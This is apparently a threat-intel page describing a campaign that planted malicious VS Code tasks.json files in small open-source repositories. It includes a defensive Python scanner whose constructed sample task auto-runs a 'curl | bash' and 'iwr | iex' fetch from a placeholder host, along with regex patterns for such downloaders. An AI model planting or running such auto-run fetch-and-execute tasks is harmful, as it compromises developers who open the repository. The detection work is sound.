lazarusholic

Everyday is lazarus.dayβ

Small Open-Source Maintainers Targeted by VS Code Tasks Malware

2026-01-26, OSM
https://opensourcemalware.com/blog/oss-maintainters-vscode-tasks-compromised
#ContagiousInterview #VSCode

At least 21 small OSS maintainers hit in 72 hours via malicious VS Code task configurations

6mile
January 26, 2026
5 min read
contagious-interview
supply-chain
github
vscode
VS Code Tasks Campaign

The OpenSourceMalware team has identified an ongoing campaign targeting open-source maintainers through VS Code task configurations. Over the past 72 hours, we've observed 21 contributors whose repositories were compromised with malicious .vscode/tasks.json files that silently download and run bash and PowerShell scripts from a third-party domain.

The key takeaway: if you maintain an open-source project, you are a target, regardless of how small or obscure your project may seem.
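The check a maintainer or a CI job can run against this vector, as an added example that is not from the OpenSourceMalware post or its tooling: a Python scanner that parses a tasks.json (including the comments and trailing commas VS Code tolerates) and flags tasks that auto-run on folder open, hide their output, or fetch remote content into an interpreter. The two tasks.json documents, the example.invalid domain and the pattern lists are constructed for illustration; nothing here is an indicator from the campaign.

```python
"""Flag VS Code tasks.json entries that auto-run on folder open and pull remote code."""
import json
import re
from dataclasses import dataclass, field

# Constructed heuristics: a build task rarely needs these, a dropper almost always does.
REMOTE_FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)
EXEC_SINK = re.compile(r"\|\s*(ba)?sh\b|\|\s*iex\b|Invoke-Expression|bash\s+-c|base64\s+(-d|--decode)", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)


@dataclass
class Finding:
    label: str
    auto_run: bool = False
    reasons: list = field(default_factory=list)
    urls: list = field(default_factory=list)


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside strings, then trailing commas (VS Code accepts both)."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped char, e.g. \" inside a command
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):      # line comment: skip to end of line
            nl = text.find("\n", i)
            i = n if nl < 0 else nl
            continue
        elif text.startswith("/*", i):      # block comment
            end = text.find("*/", i + 2)
            i = n if end < 0 else end + 2
            continue
        else:
            out.append(c)
        i += 1
    # Trailing-comma removal is regex-based; it would also fire on ",}" inside a string value.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def load_tasks(text: str) -> list:
    return [t for t in json.loads(strip_jsonc(text)).get("tasks", []) if isinstance(t, dict)]


def _command_text(task: dict) -> str:
    """Flatten command and args from the generic and per-OS (windows/linux/osx) sections."""
    parts = []
    for sec in (task, task.get("windows") or {}, task.get("linux") or {}, task.get("osx") or {}):
        cmd = sec.get("command")
        parts.append(cmd if isinstance(cmd, str) else str((cmd or {}).get("value", "")))
        for a in sec.get("args") or []:
            parts.append(a if isinstance(a, str) else str(a.get("value", "")))
    return " ".join(parts)


def scan_tasks_json(text: str) -> list:
    """One Finding per task that auto-runs, hides its output, or fetches/executes remote content."""
    findings = []
    for idx, task in enumerate(load_tasks(text)):
        f = Finding(label=task.get("label", f"task[{idx}]"))
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            f.auto_run = True
            f.reasons.append("auto-runs: runOptions.runOn=folderOpen")
        if (task.get("presentation") or {}).get("reveal") == "never":
            f.reasons.append("hidden: presentation.reveal=never")
        cmd = _command_text(task)
        if REMOTE_FETCH.search(cmd):
            f.reasons.append("remote: downloader in command")
        if EXEC_SINK.search(cmd):
            f.reasons.append("remote: fetched content piped into an interpreter")
        f.urls = URL.findall(cmd)
        if f.urls:
            f.reasons.append("remote: URL in command")
        if f.reasons:
            findings.append(f)
    return findings


def severity(f: Finding) -> str:
    remote = any(r.startswith("remote:") for r in f.reasons)
    return "high" if f.auto_run and remote else "medium" if remote or f.auto_run else "low"


# Constructed samples (not files from the campaign). BENIGN has a comment and trailing commas.
BENIGN = """{
  // normal build task
  "version": "2.0.0",
  "tasks": [ { "label": "build", "type": "shell", "command": "npm", "args": ["run", "build"], }, ]
}"""
SUSPICIOUS = """{
  "version": "2.0.0",
  "tasks": [ {
    "label": "setup", "type": "shell",
    "command": "curl -fsSL https://example.invalid/setup.sh | bash",
    "windows": { "command": "powershell -c \\"iwr https://example.invalid/s.ps1 | iex\\"" },
    "presentation": { "reveal": "never", "echo": false },
    "runOptions": { "runOn": "folderOpen" }
  } ]
}"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        for f in scan_tasks_json(text):
            print(name, f.label, severity(f), f.reasons, f.urls)
```

Run it over every .vscode/tasks.json in a checkout before the folder is opened in VS Code. The control that actually stands between a cloned repository and an automatic task is Workspace Trust: a folderOpen task does not run in a restricted (untrusted) window, so the exposure comes from trusting a repository whose task file nobody has read, and a scan like this belongs before that click, not after.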

TL;DR
Threat Actor: Unknown, but using DPRK TTPs
Attack Vector: Malicious .vscode/tasks.json files planted in repositories
Scale: 21 maintainers/contributors compromised in 72 hours
Key Insight: Small project maintainers are being actively targeted
You are not too small to be a target
There's a dangerous misconception in the open-source community: "My project only has a few stars so why …